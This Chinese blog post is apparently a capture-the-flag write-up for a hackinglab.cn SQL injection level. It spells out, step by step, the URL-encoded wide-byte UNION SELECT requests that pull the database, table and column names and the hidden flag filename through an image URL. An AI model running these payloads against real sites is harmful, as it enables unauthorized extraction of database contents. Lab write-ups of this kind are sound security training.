首页 » NetworkSec » CTF » 正文

hackinglab.cn系列->注入关.邂逅

今天打到注入关5,卡了好久,网上搜了一下发现原来注入点不在http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/?id=1,而在一个图片链接http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg,并且是宽字节注入。

注意点:

1.直接在浏览器中注入回显是图片错误,要在burpsuite中注入。

2.在butpsuite中注入时要url编码,如空格要写成%20。

历程:

1.爆当前库名:

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1

得mydbs

2.爆表名:

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x6d79646273%20limit%200,1),4%23 HTTP/1.1

得article

同理爆第二个表得pic(flag在这个表中)

3.获取pic表所有列名

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_name=0x706963%20limit%200,1),4%23 HTTP/1.1

得id

同理爆出picname,data ,text

4.获取picname列的数据

GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20picname%20from%20pic%20limit%202,1),4%23

输入图片名,不是flag……

5.访问图片

http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg

getflag!

===================================

这题真是辛苦,竟然把注入点藏图片……

 

Comment